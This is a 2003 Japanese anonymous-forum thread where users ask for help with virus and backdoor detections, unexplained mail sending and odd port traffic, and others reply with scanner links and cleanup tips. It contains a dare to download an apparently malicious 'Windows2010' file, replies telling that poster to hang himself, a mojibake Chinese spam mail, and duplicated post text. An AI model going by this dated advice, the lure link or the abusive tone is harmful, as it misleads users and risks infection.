すいませんが BKDR_CLONE.A ってのが検出されたんですが検索しても
どんなものかわからないんですが・・バックドアってことくらいしか・・
これってヤバイものですか?普通に感染しやすいもの??
どんなものかわからないんですが・・バックドアってことくらいしか・・
これってヤバイものですか?普通に感染しやすいもの??
879 :名無しさん@お腹いっぱい。:03/04/16 11:53
>>878
どうやって(何のウィルス対策製品で)そのウィルスに感染してるとわかったのか?
OSぐらい書けよ。
トレンドマイクロのオンラインスキャンで検出されたのなら、
シマンテックの方もやってみろ。
http://security.symantec.com/ssc/home.asp?j=1&langid=jp&venid=sym&plfid=20&pkj=QBSXIHKERRDTIPOKYJL
どうやって(何のウィルス対策製品で)そのウィルスに感染してるとわかったのか?
OSぐらい書けよ。
トレンドマイクロのオンラインスキャンで検出されたのなら、
シマンテックの方もやってみろ。
http://security.symantec.com/ssc/home.asp?j=1&langid=jp&venid=sym&plfid=20&pkj=QBSXIHKERRDTIPOKYJL
880 :878:03/04/16 12:22
>879
OSは2000 マイクロのウイルススキャンです。あと知り合いの事なんで
詳しいことはよくわかりません。ワームに感染したようだったのでスキャンさせたら
おまけででてきました。
OSは2000 マイクロのウイルススキャンです。あと知り合いの事なんで
詳しいことはよくわかりません。ワームに感染したようだったのでスキャンさせたら
おまけででてきました。
881 :名無しさん@お腹いっぱい。:03/04/16 12:39
ヘッダ見ると全部同じところからの
ウィルスメールが一日平均3〜4通。
セキュリティできちんと対処しているものの、
いいかげんウザいんでプロバに連絡して4/9に調査しますの
回答もらったんですが、
それ以降も状況に変化なし。
もう一回連絡して4/15にやはり調査しますの回答。
しっかり今日もウィルスは来ています。
相手はOCNなんですが、ちゃんと対処してくれるんでしょうか。
OCNとこういうやりとりした経験のある方経緯を教えてください。
また、これでOCNあるいは感染してるらしい人が
対処してくれなかった場合、どんな手段があるでしょうか。
ウィルスメールが一日平均3〜4通。
セキュリティできちんと対処しているものの、
いいかげんウザいんでプロバに連絡して4/9に調査しますの
回答もらったんですが、
それ以降も状況に変化なし。
もう一回連絡して4/15にやはり調査しますの回答。
しっかり今日もウィルスは来ています。
相手はOCNなんですが、ちゃんと対処してくれるんでしょうか。
OCNとこういうやりとりした経験のある方経緯を教えてください。
また、これでOCNあるいは感染してるらしい人が
対処してくれなかった場合、どんな手段があるでしょうか。
882 :名無しさん@お腹いっぱい。:03/04/16 12:50
>>881
Klez.E、Klez系スレッド part1〜4 参照。
http://pc.2ch.net/sec/kako/1018/10182/1018248786.html
http://pc.2ch.net/sec/kako/1021/10211/1021137509.html
http://pc.2ch.net/sec/kako/1024/10242/1024255721.html
http://pc.2ch.net/test/read.cgi/sec/1030175440/
Klez.E、Klez系スレッド part1〜4 参照。
http://pc.2ch.net/sec/kako/1018/10182/1018248786.html
http://pc.2ch.net/sec/kako/1021/10211/1021137509.html
http://pc.2ch.net/sec/kako/1024/10242/1024255721.html
http://pc.2ch.net/test/read.cgi/sec/1030175440/
883 :名無しさん@お腹いっぱい。:03/04/16 16:06
>>881
それで被害が出たなら賠償請求とか。
それで被害が出たなら賠償請求とか。
884 :名無しさん@お腹いっぱい。:03/04/16 20:07
age
885 :bloom:03/04/16 20:15
886 :名無しさん@お腹いっぱい。:03/04/17 08:09
age
(^^)
888 :名無しさん@お腹いっぱい。:03/04/17 12:39
age
889 :名無しさん@お腹いっぱい。:03/04/17 16:34
age
890 :名無しさん@お腹いっぱい。:03/04/17 16:59
コードレッドに感染したマシンは どこのポートが開くのですか?
891 :名無しさん@お腹いっぱい。:03/04/17 17:07
>>890検索汁
http://www.ipa.go.jp/security/ciadr/vul/20010727codered.html
http://www.symantec.com/region/jp/sarcj/data/c/codered_worm.html
http://www.ipa.go.jp/security/ciadr/vul/20010727codered.html
http://www.symantec.com/region/jp/sarcj/data/c/codered_worm.html
892 :名無しさん@お腹いっぱい。:03/04/18 01:54
オンラインウイルススキャンはトレンドマイクロもシマンテックも試したのですが
反応なし、にもかかわらずMSN Hotmailが勝手にメールを送り、開いた人からまたほかの人にメールを送ってるようです。
これは新種でしょうか?メールは本文はなにもないにもかかわらずサイズが125KBほどありました。
反応なし、にもかかわらずMSN Hotmailが勝手にメールを送り、開いた人からまたほかの人にメールを送ってるようです。
これは新種でしょうか?メールは本文はなにもないにもかかわらずサイズが125KBほどありました。
893 :bloom:03/04/18 01:57
894 :名無しさん@お腹いっぱい。:03/04/18 05:12
895 :名無しさん@お腹いっぱい。:03/04/18 10:03
age
896 :名無しさん@お腹いっぱい。:03/04/18 12:24
>>894
すみませんOSはXPです。HotmailはMSNのWebメールです。
それが勝手にメールを送りまくってるようなんですがウイルスチェックにひっかかりません。
まったく同じ症状がMeの友達にも出てるようですのでOSは関係ないかと思いました。すみません。
すみませんOSはXPです。HotmailはMSNのWebメールです。
それが勝手にメールを送りまくってるようなんですがウイルスチェックにひっかかりません。
まったく同じ症状がMeの友達にも出てるようですのでOSは関係ないかと思いました。すみません。
897 :動画直リン:03/04/18 12:27
898 :名無しさん@お腹いっぱい。:03/04/18 12:38
>>896
ウィルススキャンで何もでないのを前提にレスつけると、
OE使っているならOEの設定からHotmailのアカウントは一旦削除してみる。
それでも勝手に送信されるならば、MSN側に何かがある。MSNのサポートへ。
ウィルススキャンで何もでないのを前提にレスつけると、
OE使っているならOEの設定からHotmailのアカウントは一旦削除してみる。
それでも勝手に送信されるならば、MSN側に何かがある。MSNのサポートへ。
899 :名無しさん@お腹いっぱい。:03/04/18 12:42
900 :名無しさん@お腹いっぱい。:03/04/18 15:06
侵入検知システム「Snort」にセキュリティ・ホール,米CERT/CCが警告
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030418/1/
http://www.cert.org/advisories/CA-2003-13.html
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030418/1/
http://www.cert.org/advisories/CA-2003-13.html
901 :名無しさん@お腹いっぱい。:03/04/18 15:27
>>
>>471
>>471
902 :名無しさん@お腹いっぱい。:03/04/18 22:44
>>892
( ´,_ゝ`)プッ MSNの送信履歴に残ってるんだろうか?
読んだ限りではMSNや漏まいのPCとは関係ない気がするが・・別の所でたまたまメアドをKlezに拾われてたとか・・
もし、MSN Messenger・Hotmail・JavaScript(JavaScript型ウィルス含)等が巧妙に絡んだ話なら
報告宜敷く
( ´,_ゝ`)プッ MSNの送信履歴に残ってるんだろうか?
読んだ限りではMSNや漏まいのPCとは関係ない気がするが・・別の所でたまたまメアドをKlezに拾われてたとか・・
もし、MSN Messenger・Hotmail・JavaScript(JavaScript型ウィルス含)等が巧妙に絡んだ話なら
報告宜敷く
903 :名無しさん@お腹いっぱい。:03/04/18 23:05
904 :名無しさん@お腹いっぱい。:03/04/18 23:20
905 :名無しさん@お腹いっぱい。:03/04/19 00:13
>>904
それがすべて最新のパッチをあてたばっかりなんですよ…
それがすべて最新のパッチをあてたばっかりなんですよ…
906 :名無しさん@お腹いっぱい。:03/04/19 00:45
907 :892:03/04/19 01:52
908 :名無しさん@お腹いっぱい。:03/04/19 10:44
自分のPCが感染したわけではないのですが、
PCの電源を入れてしばらくすると画面が激しくぶれるというか、
TVでいう砂嵐みたいな状態になって、時間がたつにつれてそれがひどくなり、
最後には全然画面が見えない状態になってしまうという状態になるウイルスの名前は何だか分かりますか?
そのPCは修理に出して(画面の故障だと思っていたらしい)、チェックしたらウイルスだと分かったらしいんですが。
修理に出す前に家でウイルスチェックしようとしたのですが、画面が見えなくなってしまうので出来ませんでした。
PCの電源を入れてしばらくすると画面が激しくぶれるというか、
TVでいう砂嵐みたいな状態になって、時間がたつにつれてそれがひどくなり、
最後には全然画面が見えない状態になってしまうという状態になるウイルスの名前は何だか分かりますか?
そのPCは修理に出して(画面の故障だと思っていたらしい)、チェックしたらウイルスだと分かったらしいんですが。
修理に出す前に家でウイルスチェックしようとしたのですが、画面が見えなくなってしまうので出来ませんでした。
909 :908:03/04/19 10:49
ちなみにホットメールしか使ってないので
メールからの感染ではないと思います。
特にファイルをDLしたりもしてなかったようです。
メールからの感染ではないと思います。
特にファイルをDLしたりもしてなかったようです。
910 :名無しさん@お腹いっぱい。:03/04/19 11:41
>>908-909
ウイルス名を書け。
ウイルス名を書け。
911 :名無しさん@お腹いっぱい。:03/04/19 11:41
訂正。
>チェックしたらウイルスだと分かったらしいんですが。
だから、その修理に出したところが検出したウイルス名を聞け。
>チェックしたらウイルスだと分かったらしいんですが。
だから、その修理に出したところが検出したウイルス名を聞け。
912 :名無しさん@お腹いっぱい。:03/04/19 13:21
感じ悪いなココ
913 :名無しさん@お腹いっぱい。:03/04/19 13:26
>>909
> 特にファイルをDLしたりもしてなかったようです
ウイルスに感染するような奴のいってる事は信頼性が無い。
ま、感染源はネット以外でもCDROMからとかあるわけだし。
判断できない奴はアンチウイルス買えということだな。
> 特にファイルをDLしたりもしてなかったようです
ウイルスに感染するような奴のいってる事は信頼性が無い。
ま、感染源はネット以外でもCDROMからとかあるわけだし。
判断できない奴はアンチウイルス買えということだな。
914 :名無しさん@お腹いっぱい。:03/04/19 13:47
>>912.
当然だろ、お前がいるからな。
当然だろ、お前がいるからな。
915 :892:03/04/19 22:30
返信してもらいました!
ヘッダっていうのかな?はこんな感じです
>From: **** <****@hotmail.com>
>To: ****@hotmail.com
>Subject: Introduction on ADSL
>Date: Sat, 19 Apr 2003 20:32:16 +0900 (JST)
>
>Content-Type: application/octet-stream;
>name=s_CKO1001[1].jpg
>Content-Transfer-Encoding: base64
>Content-ID: <IX1HSi5199>
ヘッダっていうのかな?はこんな感じです
>From: **** <****@hotmail.com>
>To: ****@hotmail.com
>Subject: Introduction on ADSL
>Date: Sat, 19 Apr 2003 20:32:16 +0900 (JST)
>
>Content-Type: application/octet-stream;
>name=s_CKO1001[1].jpg
>Content-Transfer-Encoding: base64
>Content-ID: <IX1HSi5199>
916 :名無しさん@お腹いっぱい。:03/04/20 00:14
>>892
Recieved:がなければ何の役にも立たない。Return-Path:があると役に立つこともある。
Recieved:がなければ何の役にも立たない。Return-Path:があると役に立つこともある。
∧_∧
( ^^ )< ぬるぽ(^^)
( ^^ )< ぬるぽ(^^)
918 :名無しさん@お腹いっぱい。:03/04/20 08:43
すいません↓のソフト?がパソコン起動時急に出るようになりました。
ttp://www.42ch.net/UploaderSmall/source/1050795497.gif
これウイルスですよね?前にも一度だけ、これに引っかかってしまい。
そこで謎なんですが、どこで感染するのでしょうか?このウイルスは・・。
ありがちなケースで、全く身に覚えが無いのですよ。
どこで感染するかわかれば今後、気をつけて行こうと思うのですが・・。
宜しくお願いしますm(__)m
ttp://www.42ch.net/UploaderSmall/source/1050795497.gif
これウイルスですよね?前にも一度だけ、これに引っかかってしまい。
そこで謎なんですが、どこで感染するのでしょうか?このウイルスは・・。
ありがちなケースで、全く身に覚えが無いのですよ。
どこで感染するかわかれば今後、気をつけて行こうと思うのですが・・。
宜しくお願いしますm(__)m
919 :名無しさん@お腹いっぱい。:03/04/20 10:02
920 :cheshire-cat ◆CATBCJABLA :03/04/20 10:15
921 :cheshire-cat ◆CATBCJABLA :03/04/20 10:16
ありゃ、随分遅くかぶった。
923 :こんなの書かれたんですが?:03/04/20 13:25
33 名前:プロバイダー@”管理”者 :03/04/20 12:03
只今、上記のURLを貼付された方へ。
管理者がプロバイダーに苦情のメールを
送信されました。尚、後日貴方様が契約
されたプロバイダーよりメールまたは電話での
御連絡がありますのでその方留意下さいますよう
お願い申し上げます。
http://qb.2ch.net/test/read.cgi/sec2ch/1047844846/l50
参考までにこちらでお確かめください。
ほんとうですか?
只今、上記のURLを貼付された方へ。
管理者がプロバイダーに苦情のメールを
送信されました。尚、後日貴方様が契約
されたプロバイダーよりメールまたは電話での
御連絡がありますのでその方留意下さいますよう
お願い申し上げます。
http://qb.2ch.net/test/read.cgi/sec2ch/1047844846/l50
参考までにこちらでお確かめください。
ほんとうですか?
924 :名無しさん@お腹いっぱい。:03/04/20 13:28
>>923はマルチなんで放置でよろ
925 :名無しさん@お腹いっぱい。:03/04/20 13:33
>>924 本当ですか....小心者なのでフルエテマシタ
もうブラクらなんて貼りません
もうブラクらなんて貼りません
926 :最後にお願いします:03/04/20 13:48
マルチなんで放置でよろ
↑↑
マルチってマルチ商法のことですか?用語集に載ってなかったので。
↑↑
マルチってマルチ商法のことですか?用語集に載ってなかったので。
927 :名無しさん@お腹いっぱい。:03/04/20 13:53
928 :332、334、338、441:03/04/20 13:58
>>927 向こうにも書きましたが本当にすみません。これから気をつけます。
929 :名無しさん@お腹いっぱい。:03/04/20 21:19
age
930 :名無しさん@お腹いっぱい。:03/04/20 21:22
今ウイルスに感染しました。ってレッドスクリーンになって検疫をクリック
したんだけどダメみたいで再起動したのですが、一応何とも無いみたいです。
このままにしといていいんでしょうか?NAV入れてあるんですけど
感染してしまいショックです。
したんだけどダメみたいで再起動したのですが、一応何とも無いみたいです。
このままにしといていいんでしょうか?NAV入れてあるんですけど
感染してしまいショックです。
931 :cheshire-cat ◆CATBCJABLA :03/04/20 21:58
932 :名無しさん@お腹いっぱい。:03/04/20 22:43
感染したっぽいです。
症状
PC立ち上げるとマウスポインタが
「今日は気分がいいので飛び跳ねます」とかでて勝手にポインタが動き回ります。
svchost.exeが勝手にインターネットにアクセスします。
NAVでは特に反応ありませんでした。感染原因はおそらく自宅鯖運営のためport80
を開放していたためだと思います。OSはXPです。
駆除方法知ってる方、力を貸していただきたいです。
症状
PC立ち上げるとマウスポインタが
「今日は気分がいいので飛び跳ねます」とかでて勝手にポインタが動き回ります。
svchost.exeが勝手にインターネットにアクセスします。
NAVでは特に反応ありませんでした。感染原因はおそらく自宅鯖運営のためport80
を開放していたためだと思います。OSはXPです。
駆除方法知ってる方、力を貸していただきたいです。
934 :cheshire-cat ◆CATBCJABLA :03/04/20 22:54
>>933
そゆのって、アンチウイルスソフトではヒットしないかも。
>>932
漏れは知らんけど。
後学のために、経緯をちゃんと書いて欲しいでし。
そゆ現象が起きる頃に作成された・もしくは改変されたファイルは無いでしょか。
スタート→検索で、日付を元に検索して下され。
それと「Ctrl Alt Del」を一度に押して、プロセスタブの中を報告してくだされ。
そゆのって、アンチウイルスソフトではヒットしないかも。
>>932
漏れは知らんけど。
後学のために、経緯をちゃんと書いて欲しいでし。
そゆ現象が起きる頃に作成された・もしくは改変されたファイルは無いでしょか。
スタート→検索で、日付を元に検索して下され。
それと「Ctrl Alt Del」を一度に押して、プロセスタブの中を報告してくだされ。
935 :cheshire-cat ◆CATBCJABLA :03/04/20 22:56
936 :名無しさん@お腹いっぱい。:03/04/20 23:00
ゴミ突っ込まれたなら他に何されてるかわからないから、俺ならクリーンインストする。
937 :cheshire-cat ◆CATBCJABLA :03/04/20 23:04
938 :名無しさん@お腹いっぱい。:03/04/20 23:12
932です。オンラインスキャンでは異常ないです。4/20で検索したら,
systemフォルダの中にピカチュウのアイコンのpika.exeってのが入っ
てました。同様にsystem32のなかにIEXPL0RE.exeっていうのも入っ
てました。怪しいのはこれぐらいです。確か今までなかったと思います。
>>935
見れませんでした
プロセスタブはたくさん動いてるで何を見ればいいのかよくわかんないです。
systemフォルダの中にピカチュウのアイコンのpika.exeってのが入っ
てました。同様にsystem32のなかにIEXPL0RE.exeっていうのも入っ
てました。怪しいのはこれぐらいです。確か今までなかったと思います。
>>935
見れませんでした
プロセスタブはたくさん動いてるで何を見ればいいのかよくわかんないです。
939 :cheshire-cat ◆CATBCJABLA :03/04/20 23:27
940 :名無しさん@お腹いっぱい。:03/04/20 23:45
実行しました。おかげで立ち上げたときのマウスの奴はでなくなりました。
しかし結局何が原因だったかわかってないです。それになぜかNAVの定義
ファイルがアップロードしてもエラーになってしまうんですよね。
ほかにも悪さしてるのがあるのかもしれないです。
どっちにしてもこのまま使うのは気持ちが悪いのでクリーンインストします。
しかし結局何が原因だったかわかってないです。それになぜかNAVの定義
ファイルがアップロードしてもエラーになってしまうんですよね。
ほかにも悪さしてるのがあるのかもしれないです。
どっちにしてもこのまま使うのは気持ちが悪いのでクリーンインストします。
941 :名無しさん@お腹いっぱい。:03/04/20 23:48
Backdoor.Lithium
Backdoor.Lithium はハッカーが感染先コンピュータをリモートから制御できるようにします。
別名: BackDoor-YQ, TROJ_LITH, Troj/Bdoor-YQ
種別: トロイの木馬
今日、またーりネットサーフィンしてたら、windows上のファイルが勝手に開いて
自分のちんぽ激写した写真ファイルを見られますた(´Д⊂グスン
とりあえず感染したファイルは削除したんだけどほかにもなにかしないといけないのでしょうか?
おながいします。もう漏れのSM写真みられたくないんでつ。゚(゚´Д`゚)゚。
Backdoor.Lithium はハッカーが感染先コンピュータをリモートから制御できるようにします。
別名: BackDoor-YQ, TROJ_LITH, Troj/Bdoor-YQ
種別: トロイの木馬
今日、またーりネットサーフィンしてたら、windows上のファイルが勝手に開いて
自分のちんぽ激写した写真ファイルを見られますた(´Д⊂グスン
とりあえず感染したファイルは削除したんだけどほかにもなにかしないといけないのでしょうか?
おながいします。もう漏れのSM写真みられたくないんでつ。゚(゚´Д`゚)゚。
942 :cheshire-cat ◆CATBCJABLA :03/04/20 23:51
>>940
Nortonの定義ファイルの問題っすけど。
日付が不整合になるためらしですけど(漏れも一度それで死にますた
Nortonの関連ファイルをメチャ消すと解消しますが。
そゆ面倒な事しなくても、次回のUpdate時ならちゃんとインスコできますよん。
Nortonの定義ファイルの問題っすけど。
日付が不整合になるためらしですけど(漏れも一度それで死にますた
Nortonの関連ファイルをメチャ消すと解消しますが。
そゆ面倒な事しなくても、次回のUpdate時ならちゃんとインスコできますよん。
943 :名無しさん@お腹いっぱい。:03/04/20 23:54
944 :名無しさん@お腹いっぱい。:03/04/21 01:56
redlofに掛かった・・・
関連サイト見た所駆除めんどそうだし、いい機会だから再インスコするか
関連サイト見た所駆除めんどそうだし、いい機会だから再インスコするか
945 :名無しさん@お腹いっぱい。:03/04/21 02:14
シマンテックのオンラインスキャンをした所、2chのログにVBS.LoveLetter.Aが反応したのですが
これって上の方でも言ってたソースコードのレスが引っ掛かってるって奴ですよね?
これって上の方でも言ってたソースコードのレスが引っ掛かってるって奴ですよね?
946 :名無しさん@お腹いっぱい。:03/04/21 08:12
947 :名無しさん@お腹いっぱい。:03/04/21 15:54
http://members.jcom.home.ne.jp/i-am-a-student-boy/index1.html
すっげぇ〜面白いものみつけた・・・。
しかもこの恐怖感・・・。
勇気のある人はこのサイトに言って、Windows2010って奴落としてみて。
報告おながいしまつ。
すっげぇ〜面白いものみつけた・・・。
しかもこの恐怖感・・・。
勇気のある人はこのサイトに言って、Windows2010って奴落としてみて。
報告おながいしまつ。
948 :名無しさん@お腹いっぱい。:03/04/21 16:03
>>947
この板では鑑定はしない。回線切って首吊って死んでくれ。
この板では鑑定はしない。回線切って首吊って死んでくれ。
949 :名無しさん@お腹いっぱい。:03/04/21 16:04
>>947
この板では鑑定はやらない。
ラウンジの
勇気がなくて見られない画像解説スレPart340
http://ex.2ch.net/test/read.cgi/entrance/1050843820/l50へどうぞ。
この板では鑑定はやらない。
ラウンジの
勇気がなくて見られない画像解説スレPart340
http://ex.2ch.net/test/read.cgi/entrance/1050843820/l50へどうぞ。
かぶったから、漏れも
回線切って首吊って死んでくれ>947
と付け加えておく(w
回線切って首吊って死んでくれ>947
と付け加えておく(w
951 :名無しさん@お腹いっぱい。:03/04/21 16:06
953 :名無しさん@お腹いっぱい。:03/04/21 16:21
>>952
どっか逝け
どっか逝け
954 :名無しさん@お腹いっぱい。:03/04/21 17:36
VBS.Redlof.Aに感染したんで駆除したのだが、何故かレジストリは変更されてなかった模様
redlof実行時に生成されるというファイルも見つからないんで大丈夫そうではあるが、なんかかえって気持ち悪い…
いっその事スパーリと再インスコした方がいいのだろうか?
redlof実行時に生成されるというファイルも見つからないんで大丈夫そうではあるが、なんかかえって気持ち悪い…
いっその事スパーリと再インスコした方がいいのだろうか?
955 :名無しさん@お腹いっぱい。:03/04/21 18:28
956 :名無しさん@お腹いっぱい。:03/04/21 20:24
ローカルディスクが勝手に共有設定になるんだけど
これって普通?
ウィルス?
スキャンしても何も出てこないし誰か頼む
これって普通?
ウィルス?
スキャンしても何も出てこないし誰か頼む
957 :名無しさん@お腹いっぱい。:03/04/21 20:29
>>956
OSも書かずにレスがつくと思うな。
OSも書かずにレスがつくと思うな。
959 :名無しさん@お腹いっぱい。:03/04/21 20:41
960 :名無しさん@お腹いっぱい。:03/04/21 20:42
>>956
管理共有に1マンペソ
管理共有に1マンペソ
961 :名無しさん@お腹いっぱい。:03/04/22 10:39
まだいたのか。よそでやってくれ。
この板では誰もクリックしないよ。
この板では誰もクリックしないよ。
962 :名無しさん@お腹いっぱい。:03/04/22 12:47
アプリやファイル消していっても
その度にHD容量減って行くっていうのは
なんてウィルス?
その度にHD容量減って行くっていうのは
なんてウィルス?
963 :名無しさん@お腹いっぱい。:03/04/22 14:10
964 :名無しさん@お腹いっぱい。:03/04/22 14:13
965 :bloom:03/04/22 14:28
966 :名無しさん@お腹いっぱい。:03/04/22 14:51
967 :名無しさん@お腹いっぱい。:03/04/22 15:21
>>966
別に煽ってないよIDで確認しないでよキモいから
別に煽ってないよIDで確認しないでよキモいから
968 :名無しさん@お腹いっぱい。:03/04/22 16:30
《我是警察》
?个警官出去打?,其中的一个人却是第一次打?,所以他?得有些激?。打??始了,?名警官找到了一个?鹿群很近的密林,等待着鹿群的接近。。。鹿群慢慢的向他走来,他得手心?始出汗,他?上眼猛地从?林中跳了出来,向天空打了一?,并喊到:“都不??,我是警察!”
??家具行?的商??利?件
?个警官出去打?,其中的一个人却是第一次打?,所以他?得有些激?。打??始了,?名警官找到了一个?鹿群很近的密林,等待着鹿群的接近。。。鹿群慢慢的向他走来,他得手心?始出汗,他?上眼猛地从?林中跳了出来,向天空打了一?,并喊到:“都不??,我是警察!”
??家具行?的商??利?件
969 :名無しさん@お腹いっぱい。:03/04/22 16:33
つづき
《商智?子商?系??件》是一套???助家具行?利用互?
网,来拓展市?的一套网上??系?工具,?有效地解决了企?
的?品?售、?存??、采??价、?取定?以及生???工率不足等??,
并能?企??来直接的??效益(?套2800元)。?迎免?索取登??号与密?,免??用?征各地独家代理!商智?子商??件,????得更容易!
《商智?子商?系??件》是一套???助家具行?利用互?
网,来拓展市?的一套网上??系?工具,?有效地解决了企?
的?品?售、?存??、采??价、?取定?以及生???工率不足等??,
并能?企??来直接的??效益(?套2800元)。?迎免?索取登??号与密?,免??用?征各地独家代理!商智?子商??件,????得更容易!
970 :名無しさん@お腹いっぱい。:03/04/22 16:34
深?市斯盛科技??有限公司市?部
??:0755-26530108;0755-26530418?
email:[email protected]
?系人:?先生
MSN: [email protected]
QQ: 11730952
如果?封?件打?了?,我?感到很抱歉,?件退??
Email至如下地址:[email protected]
こんなメールに悩まされています
意味分かる人いますか
??:0755-26530108;0755-26530418?
email:[email protected]
?系人:?先生
MSN: [email protected]
QQ: 11730952
如果?封?件打?了?,我?感到很抱歉,?件退??
Email至如下地址:[email protected]
こんなメールに悩まされています
意味分かる人いますか
971 :名無しさん@お腹いっぱい。:03/04/22 16:37
>>970
ただのSPAM。セキュリティとは何の関係も無い。
ただのSPAM。セキュリティとは何の関係も無い。
972 :名無しさん@お腹いっぱい。:03/04/22 16:38
そうですか。よかったありがとうございます。
973 :名無しさん@お腹いっぱい。:03/04/22 17:09
>>970.
メールでアドレスを削除設定すれば気にならなくなるよ。
メールソフトやプロバイダによっては落とす前に、
サーバー上で除去できるものやところもあるから、
とりあえず、自分の環境を調べて見ると良いですよ。
内容は>>971さんの言った通り、ただのスパムなので、
ランダムに送ってるのか、
悪意を持ったサイトを訪れたときに標準アドを取られて送られたんでしょう。
無視するのが一番。
メールでアドレスを削除設定すれば気にならなくなるよ。
メールソフトやプロバイダによっては落とす前に、
サーバー上で除去できるものやところもあるから、
とりあえず、自分の環境を調べて見ると良いですよ。
内容は>>971さんの言った通り、ただのスパムなので、
ランダムに送ってるのか、
悪意を持ったサイトを訪れたときに標準アドを取られて送られたんでしょう。
無視するのが一番。
974 :名無しさん@お腹いっぱい。:03/04/22 17:42
発信元IPアドレスを偽装して
137番ポート(UDP)を叩かれてまーす。
こんなん↓
Incoming 22/Apr/2003 16:55:20 UDP 137 192.168.0.13
フレッツADSLでルータは使ってないので
こんなとこからパケットがくるはず無いんだけど…
新種?
137番ポート(UDP)を叩かれてまーす。
こんなん↓
Incoming 22/Apr/2003 16:55:20 UDP 137 192.168.0.13
フレッツADSLでルータは使ってないので
こんなとこからパケットがくるはず無いんだけど…
新種?
975 :cheshire-cat ◆CATBCJABLA :03/04/22 21:44
976 :名無しさん@お腹いっぱい。:03/04/23 01:48
>>962
君のおつむがウィルス
君のおつむがウィルス
977 :名無しさん@お腹いっぱい。:03/04/23 16:22
978 :名無しさん@お腹いっぱい。:03/04/24 00:48
PC を起動して3時間たつと、いきなりファイルが消されるんですが
何か心当たりとか無いでしょうか?
VB2003 の最新のパターンファイルでは何も検出されませんでした。
OS は XP Home を複数のユーザーで使用しています。
症状が出始めたときは Administrator のパスワードを設定していませんでした。
レジストリ
HKEY_CURRENT_USER\...\Run
ctfmon.exe C:\windows\System32\ctfmon.exe
HKEY_LOCAL_MACHINE\...\Run
CloneCDElbyCDFL "C:\Program Files\Elaborate Bytes\CloneCD\ElbyCheck.exe" /L ElbyCDFL
IMJPMIG8.1 C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE /Spoil /RemAdvDef /Migration32
PCCClient.exe "C:\Program Files\Trend Micro\Virus Buster 2003\PCCClient.exe"
pccguide.exe "C:\Program Files\Trend Micro\Virus Buster 2003\pccguide.exe"
PHIME2002A C:\WINDOWS\System32\IME\TINTLGNT\TINTSETP.EXE /IMEName
PHIME2002ASync C:\WINDOWS\System32\IME\TINTLGNT\TINTSETP.EXE /SYNC
Pop3trap.exe "C:\Program Files\Trend Micro\Virus Buster 2003\Pop3trap.exe"
QuickTime Task "C:\Program Files\QuickTime\qttask.exe" -atboottime
SoundMan soundman.exe
TkBellExe "C:\Program Files\Common Files\Real\Update_OB\realsched.exe" -osboot
TM Outbreak Agent "C:\Program Files\Trend Micro\Virus Buster 2003\TMOAgent.exe" /run
何か心当たりとか無いでしょうか?
VB2003 の最新のパターンファイルでは何も検出されませんでした。
OS は XP Home を複数のユーザーで使用しています。
症状が出始めたときは Administrator のパスワードを設定していませんでした。
レジストリ
HKEY_CURRENT_USER\...\Run
ctfmon.exe C:\windows\System32\ctfmon.exe
HKEY_LOCAL_MACHINE\...\Run
CloneCDElbyCDFL "C:\Program Files\Elaborate Bytes\CloneCD\ElbyCheck.exe" /L ElbyCDFL
IMJPMIG8.1 C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE /Spoil /RemAdvDef /Migration32
PCCClient.exe "C:\Program Files\Trend Micro\Virus Buster 2003\PCCClient.exe"
pccguide.exe "C:\Program Files\Trend Micro\Virus Buster 2003\pccguide.exe"
PHIME2002A C:\WINDOWS\System32\IME\TINTLGNT\TINTSETP.EXE /IMEName
PHIME2002ASync C:\WINDOWS\System32\IME\TINTLGNT\TINTSETP.EXE /SYNC
Pop3trap.exe "C:\Program Files\Trend Micro\Virus Buster 2003\Pop3trap.exe"
QuickTime Task "C:\Program Files\QuickTime\qttask.exe" -atboottime
SoundMan soundman.exe
TkBellExe "C:\Program Files\Common Files\Real\Update_OB\realsched.exe" -osboot
TM Outbreak Agent "C:\Program Files\Trend Micro\Virus Buster 2003\TMOAgent.exe" /run
979 :名無しさん@お腹いっぱい。:03/04/24 00:55
980 :名無しさん@お腹いっぱい。:03/04/24 04:48
デロダーにやられました
981 :名無しさん@お腹いっぱい。:03/04/24 11:22
デロダーって仮面ライダーの悪役怪獣に出てきそうな名前だな。
982 :名無しさん@お腹いっぱい。:03/04/24 11:23
次スレ立て、どなたかお願いします。
983 :名無しさん@お腹いっぱい。:03/04/24 12:14
良い機会だから、質問スレの数を減らせば?
984 :名無しさん@お腹いっぱい。:03/04/24 12:17
>>983
ウィルス系と初心者・くだ質系の2つにする?
ウィルス系と初心者・くだ質系の2つにする?
985 :名無しさん@お腹いっぱい。:03/04/24 12:41
>>976
レスありがと。
レスありがと。
988 :名無しさん@お腹いっぱい。:03/04/25 02:17
>>986
お疲れさんです!
お疲れさんです!
989 :名無しさん@お腹いっぱい。:03/04/26 00:27
さっき久々にオンラインウイルススキャンをすると、
BKDR_BHIROT.A 情報なし
C_BHIROT.A ↓
>これはIRCスクリプトで記述された「トロイの木馬型」不正プログラムで、
>mIRCバージョン6.03と連動して不正活動を行うIRCボットです。
>UPX形式で圧縮された状態で届き、展開後に作成されるファイル名は"task.exe"です。
>圧縮状態のこのmIRCプログラムはトレンドマイクロ製品でBKDR_BHIROT.Aとして検出できます。
が見つかりました。
意味がわからないのは、
>>UPX形式で圧縮された状態で届き、
どこから来るものなのでしょうか?メールでしょうか?どこかのサイトに行ったからでしょうか?
また、前者のウイルス情報がなくて困ってます。
どなたか心辺りありませんか?
宜しくお願いしますm(__)m
BKDR_BHIROT.A 情報なし
C_BHIROT.A ↓
>これはIRCスクリプトで記述された「トロイの木馬型」不正プログラムで、
>mIRCバージョン6.03と連動して不正活動を行うIRCボットです。
>UPX形式で圧縮された状態で届き、展開後に作成されるファイル名は"task.exe"です。
>圧縮状態のこのmIRCプログラムはトレンドマイクロ製品でBKDR_BHIROT.Aとして検出できます。
が見つかりました。
意味がわからないのは、
>>UPX形式で圧縮された状態で届き、
どこから来るものなのでしょうか?メールでしょうか?どこかのサイトに行ったからでしょうか?
また、前者のウイルス情報がなくて困ってます。
どなたか心辺りありませんか?
宜しくお願いしますm(__)m
990 :bloom:03/04/26 00:29
ゴメン・・同様してて、
前者のウイルス、
>圧縮状態のこのmIRCプログラムはトレンドマイクロ製品で
>「BKDR_BHIROT.A」として検出できます
ちゃんと書いてあった・・。
でもどこから感染したのかは不明です。
前者のウイルス、
